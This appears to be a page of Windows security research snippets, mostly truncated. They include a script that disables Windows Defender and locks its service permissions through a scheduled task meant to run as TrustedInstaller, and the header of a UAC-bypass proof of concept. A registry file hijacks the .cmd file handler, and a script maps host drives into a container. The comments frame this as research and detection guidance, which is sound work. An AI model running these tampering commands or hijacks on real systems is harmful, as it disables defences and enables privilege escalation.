View map_host_drive.ps1
Param(
    # Drive letter on the host to expose, e.g. "C:" (first positional argument).
    [Parameter(Mandatory, Position = 0)]
    [string]$HostDrive,
    # Drive letter the host drive should appear as inside the container, e.g. "X:".
    [Parameter(Mandatory, Position = 1)]
    [string]$LocalDrive
)
# Script to map a host drive inside a Windows Docker Server Container.
# You need to be an admin in the container for this to work.
# Use as: .\map_host_drive C: X:
#
# NOTE(review): only the parameter block is visible in this excerpt; the
# mapping logic follows it. Whatever that mechanism is, a container that can
# reach host drives has effectively crossed its isolation boundary, so treat
# this as a lab/debugging aid and never grant the privileges it needs to an
# untrusted workload.
View doh.ps1
# doh.ps1 (excerpt): disables the Windows Defender service (WinDefend) by
# registering a scheduled task that runs the two sc.exe commands below; the
# lines after this excerpt (not shown here) are expected to use the raw
# Task Scheduler COM API to run that task as NT SERVICE\TrustedInstaller.
#
# WARNING: this is security-control tampering. Use only on systems you own
# or are authorised to test. Defenders: a WinDefend start-type change, a
# rewrite of the WinDefend service security descriptor, and a task created
# and then executed as TrustedInstaller are each worth alerting on.
#
# sc.exe config windefend start= disabled
#   -> the service will no longer start at boot.
# sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)
#   -> replaces the service object's DACL with two deny ACEs: GENERIC_ALL
#      denied to Everyone (WD) and to OWNER RIGHTS (OW). After this nobody,
#      administrators included, can open the service through the SCM to
#      re-enable it without first repairing the descriptor.
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'
# cmd.exe /C runs both commands in sequence and exits.
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
# No -User/-Principal is given, so as registered here the task carries the
# default principal. The TrustedInstaller identity set up below is presumably
# what supplies enough privilege to modify WinDefend, which an Administrator
# token alone is normally not allowed to reconfigure.
Register-ScheduledTask -TaskName 'TestTask' -Action $a
# Switch to the Schedule.Service COM object: this is the interface used to
# retarget the task at a service SID such as TrustedInstaller.
$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()
# Service SID that owns protected Windows components; the remainder of the
# script (outside this view) is expected to run 'TestTask' as this account.
$user = 'NT SERVICE\TrustedInstaller'
# Root task folder, where 'TestTask' was registered above.
$folder = $svc.GetFolder('\')
View kill_file_locker.ps1
Import-Module NtObjectManager | |
<#
Kill every process that currently holds a handle to (and thereby locks) the file at $Path.
Destructive: the holders are terminated, not asked to release the file, so list them first
if losing their unsaved state matters. Requires the NtObjectManager module imported above.
#>
function Kill-FileLocker { | |
param( | |
[Parameter(Mandatory)] | |
[string]$Path | |
) |
View bypass_uac.ps1
# PowerShell script to bypass UAC on Vista+. It assumes at least one elevated
# process already exists on the same desktop; it does not rely on a UAC
# auto-elevation flaw. Proof-of-concept only: Microsoft does not treat UAC as
# a security boundary, so this is not a reportable vulnerability, but it is
# a useful reminder that an elevated process on a shared desktop is reachable
# from medium-integrity code.
# Technical details in:
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html
# Requires the NtObjectManager module: Install-Module NtObjectManager
Import-Module NtObjectManager |
View ntfs_testcase.cpp
#include <stdio.h> | |
#include <tchar.h> | |
#include <Windows.h> | |
#include <string> | |
int _tmain(int argc, _TCHAR* argv[]) | |
{ | |
for (int i = 1; i < 128; ++i) | |
{ | |
std::wstring name = L".\a"; |
View cmdfile registration
Windows Registry Editor Version 5.00

; Per-user override of the "cmdfile" ProgID (the file type behind .cmd).
; HKCU\Software\Classes is merged over HKLM\Software\Classes when
; HKEY_CLASSES_ROOT is built, so this changes what ShellExecute launches
; for .cmd files for the current user only -- no admin rights needed.
; calc.exe is a harmless marker proving the handler was hijacked; a real
; attacker would point the open verb at their own payload, so writes to
; HKCU\Software\Classes\*\shell\open\command are worth monitoring.
[HKEY_CURRENT_USER\SOFTWARE\Classes\cmdfile\shell\open\command]
@="c:\\windows\\system32\\calc.exe"
View Test for MS14-027
#include <stdio.h> | |
#include <tchar.h> | |
#include <Windows.h> | |
int wmain(int argc, WCHAR* argv[]) | |
{ | |
if (argc < 2) | |
{ | |
printf("Usage: ImpersonateSHExec filename [sessionid]\n"); | |
return 1; |